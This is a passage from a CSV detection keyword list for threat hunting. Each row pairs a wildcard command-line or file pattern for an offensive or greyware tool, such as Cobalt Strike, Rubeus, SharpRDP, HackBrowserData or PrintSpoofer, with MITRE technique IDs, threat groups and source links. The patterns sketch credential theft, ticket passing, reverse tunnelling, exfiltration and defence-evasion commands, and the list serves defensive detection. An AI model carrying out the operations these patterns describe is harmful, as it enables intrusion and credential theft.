- T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.BruteRatel*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*.cobaltstrike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*.cobaltstrike.beacon_keys*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*.com/dcsync/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*.com/SecureAuthCorp*","offensive_tool_keyword","Github Username","github repo hosting exploitation tools for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SecureAuthCorp","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.com/SpiderLabs*","offensive_tool_keyword","Github Username","github repo hosting exploitation tools adn documentation for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SpiderLabs","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.dev.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.doc.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.doc.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.doc.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.doc.htm*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.doc.jar*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.doc.js*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.doc.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.doc.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.docx.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.docx.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.docx.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.docx.htm*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.docx.jar*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.docx.js*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.docx.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.docx.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.events.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.exe --b64 --path * --args ","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" +"*.exe certificates /pvk:*.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe -group=remote -computername=*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe * /hide * /range:* /auto:*.*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*.exe * -eventlog *Key Management Service*","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","348","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" +"*.exe * --source Persistence*","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","348","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" +"*.exe *.bin -enc aes -lang csharp*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*.exe *-searchforest*-pwdlastset*","offensive_tool_keyword","Get-RBCD-Threaded","Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory Environments","T1558 - T1208 - T1550 - T1484 - T1486","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/FatRodzianko/Get-RBCD-Threaded","1","0","N/A","N/A","2","115","19","2021-08-10T23:29:48Z","2019-12-21T00:08:28Z" +"*.exe /disableLSAProtection*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*.exe /method:create /taskname:* /trigger:* /modifier:* /program:* /argument:*.dll /remoteserver:*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" +"*.exe /wakeall*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*.exe action=GetScheduledTaskCOMHandler*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*.exe action=ListRunningServices*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*.exe action=ListScheduledTasks*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*.exe action=ListTaskNames*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*.exe --adcs * --remote *","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" +"*.exe app /create /name:* /uncpath:*\\*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" +"*.exe app /deploy /name:* /groupname:* /assignmentname:*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" +"*.exe asktgt /user:* /aes256:* /opsec /ptt*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus More stealthy variant but requires the AES256 key (see 'Dumping OS credentials with Mimikatz' section)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.exe asktgt /user:* /rc4:* /createnetonly:*cmd.exe*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus Pass the ticket to a sacrificial hidden process. allowing you to e.g. steal the token from this process (requires elevation)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.exe asktgt /user:* /rc4:* /ptt*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus Request a TGT as the target user and pass it into the current session","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.exe AzureStorage --connectionstring * --filepath * --extensions *","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" +"*.exe -b * -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default'*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*.exe -b all -f json --dir results -cc*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*.exe backupkey /nowrap *.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe certificates /mkfile:*.txt*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe client *:* R:socks*","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.exe compute --sid * --kdskey *","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" +"*.exe computername=* command=* username=* password=* nla=true*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*.exe computername=* command=* username=* password=* takeover=true*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*.exe computername=* command=* username=* password=* connectdrive=true*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*.exe computername=* command=* username=* password=* elevated=taskmgr*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*.exe computername=* command=* username=* password=* elevated=winr*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*.exe computername=* command=* username=* password=* exec=cmd*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*.exe create /payload* /kb*","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for lateral movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","5","408","63","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" +"*.exe credentials /pvk:*.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe -d * -u * -p * -m LDAPS*","offensive_tool_keyword","SharpLdapRelayScan","SharLdapRealyScan is a tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authenticationvand it's a C# port of?LdapRelayScan","T1557.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/klezVirus/SharpLdapRelayScan","1","1","N/A","7","1","72","16","2022-02-26T22:03:11Z","2022-02-12T08:16:59Z" +"*.exe -d 1 -c cmd.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*.exe -d 3 -c *powershell -ep bypass*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 